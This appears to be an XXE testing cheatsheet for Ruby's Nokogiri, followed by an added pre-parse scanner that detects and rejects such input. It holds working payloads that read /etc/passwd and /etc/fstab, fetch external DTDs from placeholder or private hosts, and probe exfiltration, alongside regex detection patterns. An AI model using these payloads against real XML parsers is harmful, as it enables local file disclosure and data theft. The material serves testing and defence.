An XML Entity testing cheatsheet. Testing was done using an older vulnerable version of nokogiri. In IRB you can require previous versions of gems. Certain techniques (e.g. XInclude) may require additional settings in Nokogiri.

XML Headers:

<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>
e.g.
doc = Nokogiri::XML("<!DOCTYPE root [ <!ENTITY spl SYSTEM \"file:///etc/passwd\"> ]>\n<a>&spl;</a>")
doc.children.children.children.text

Parameter entity test. One benefit is that a parameter entity is expanded automatically inside the DOCTYPE:

<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]>
e.g.
options = Nokogiri::XML::ParseOptions::DTDATTR
doc = Nokogiri::XML::Document.parse("<!DOCTYPE test [<!ENTITY % dtd SYSTEM \"http://172.16.122.177/student.dtd\"><!ENTITY % a \"test %dtd\">]>\n<test>success</test>", nil, nil, options)
doc.children.text

Combined Entity and Parameter Entity:

<!DOCTYPE root [<!ENTITY post SYSTEM "http://"><!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]><root>&post;</root>

XInclude:

<document xmlns:xi="http://<IP>/XInclude"><footer><xi:include href="title.xml"/></footer></document>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>
</root>

URL handler. This follows the “XML Entity - IBM” reference; I have not seen this work “in the wild”. It should be useful for exfiltration testing:

<!DOCTYPE root [<!ENTITY c PUBLIC "-//W3C//TEXT copyright//EN" "http://[IP]/copyright.xml">]>

XML Schema Inline:

<madeuptag xmlns="http://[ip]" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://[IP]">
</madeuptag>

Remote XML Schema. I also have not been able to get this to work:

<!DOCTYPE root PUBLIC "abc/Catalog" "http://[IP]/catalog.dtd">
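
Pre-parse gate (added example, not code from the original post). Every technique on this page relies on a construct that is visible in the raw document text before any parsing happens: a DOCTYPE, a SYSTEM/PUBLIC entity, a parameter entity, an external DTD subset, an XInclude namespace, or a schemaLocation hint. The pure-Ruby scanner below flags those constructs on untrusted input and rejects the document before it is handed to Nokogiri. The check names, the regexes and the UnsafeXml class are assumptions of this example; the sample documents are constructed copies of the cheatsheet payloads with their placeholders kept as-is.

```ruby
# Added example (not from the original post): a pre-parse gate that scans
# untrusted XML for the constructs exercised on this page and rejects them
# before the document reaches Nokogiri or any other parser. The check names,
# the regexes and UnsafeXml are assumptions of this example; SAMPLES are
# constructed copies of the cheatsheet payloads.

class UnsafeXml < StandardError; end

# Name => pattern over the raw document text. Scanning text rather than a
# parsed DOM is deliberate: the parser is what we do not yet trust, and a
# false positive (e.g. the word DOCTYPE inside a comment) is the safe failure.
CHECKS = {
  doctype:          /<!DOCTYPE\b/i,                                  # any DTD at all
  external_dtd:     /<!DOCTYPE\s+\S+\s+(SYSTEM|PUBLIC)\b/i,         # external subset / catalog
  external_entity:  /<!ENTITY\s+(%\s*)?\w+\s+(SYSTEM|PUBLIC)\b/i,   # classic XXE (general or parameter)
  parameter_entity: /<!ENTITY\s+%/,                                  # %dtd; style entities
  xinclude:         /xmlns:\w+\s*=\s*["'][^"']*XInclude["']/i,       # xi:include namespace binding
  schema_location:  /\bxsi:(noNamespace)?[sS]chemaLocation\s*=/      # remote schema fetch hint
}.freeze

# Returns the risky constructs found, in CHECKS order ([] when clean).
def audit_xml(xml)
  CHECKS.each_with_object([]) { |(name, re), found| found << name if xml.match?(re) }
end

# Gate: raise unless every finding is on the caller's allow list.
# allow: [:doctype] lets a document with only internal entities through
# (the vanilla entity test) while still refusing SYSTEM/PUBLIC/% entities.
def gate_xml(xml, allow: [])
  blocked = audit_xml(xml) - allow
  raise UnsafeXml, "rejected untrusted XML: #{blocked.join(', ')}" unless blocked.empty?
  xml
end

# Constructed copies of the cheatsheet payloads (placeholders kept as-is).
SAMPLES = {
  vanilla:   '<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>',
  system:    '<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]><root>&post;</root>',
  parameter: '<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]><root/>',
  xinclude:  '<root xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="file:///etc/fstab" parse="text"/></root>',
  public:    '<!DOCTYPE root [<!ENTITY c PUBLIC "-//W3C//TEXT copyright//EN" "http://[IP]/copyright.xml">]><root>&c;</root>',
  catalog:   '<!DOCTYPE root PUBLIC "abc/Catalog" "http://[IP]/catalog.dtd"><root/>',
  schema:    '<madeuptag xmlns="http://[ip]" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://[IP]"></madeuptag>',
  clean:     '<root><item>1</item></root>'
}.freeze

# Runs every sample through the audit and returns name => findings.
def audit_samples
  SAMPLES.transform_values { |xml| audit_xml(xml) }
end

if __FILE__ == $PROGRAM_NAME
  audit_samples.each { |name, findings| puts "#{name.to_s.ljust(10)} #{findings.inspect}" }
  begin
    gate_xml(SAMPLES[:system], allow: [:doctype])
  rescue UnsafeXml => e
    puts e.message
  end
end
```

The gate complements rather than replaces parser hardening: when the document does reach Nokogiri, leave NOENT out of the parse options and set NONET (both in Nokogiri::XML::ParseOptions) so that entities are not substituted and no network fetch is attempted even if something slips past the scan.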

Useful Links: